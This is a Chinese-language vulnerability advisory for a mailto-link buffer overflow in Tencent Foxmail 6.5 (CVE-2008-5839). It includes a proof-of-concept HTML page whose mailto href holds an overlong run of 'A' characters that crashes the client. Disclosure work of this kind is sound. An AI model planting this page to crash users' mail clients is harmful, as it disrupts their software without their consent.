发布日期：2008-09-22
更新日期：2008-09-24

受影响系统：

Tencent Foxmail 6.5

描述：

---

BUGTRAQ  ID: 31294
CVE(CAN) ID: CVE-2008-5839

Foxmail是在中国非常广泛使用的邮件客户端。

Foxmail客户端在处理href标签中的mailto字段时存在缓冲区溢出漏洞。如果用户将Foxmail设置为默认的邮件客户端的话，则受骗点击了网页中的发送邮件链接的话就可能触发这个溢出，导致客户端崩溃。

<*来源：Friddy
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<body>
<P>Author:friddy   QQ:568623
<P>Result:Program Crash
<BR>
<A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">

ClickME</a>
>Clickme</A>
</body>
</html>

建议：

---

厂商补丁：

Tencent
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://fox.foxmail.com.cn/

浏览次数：5230
严重程度：0（网友投票）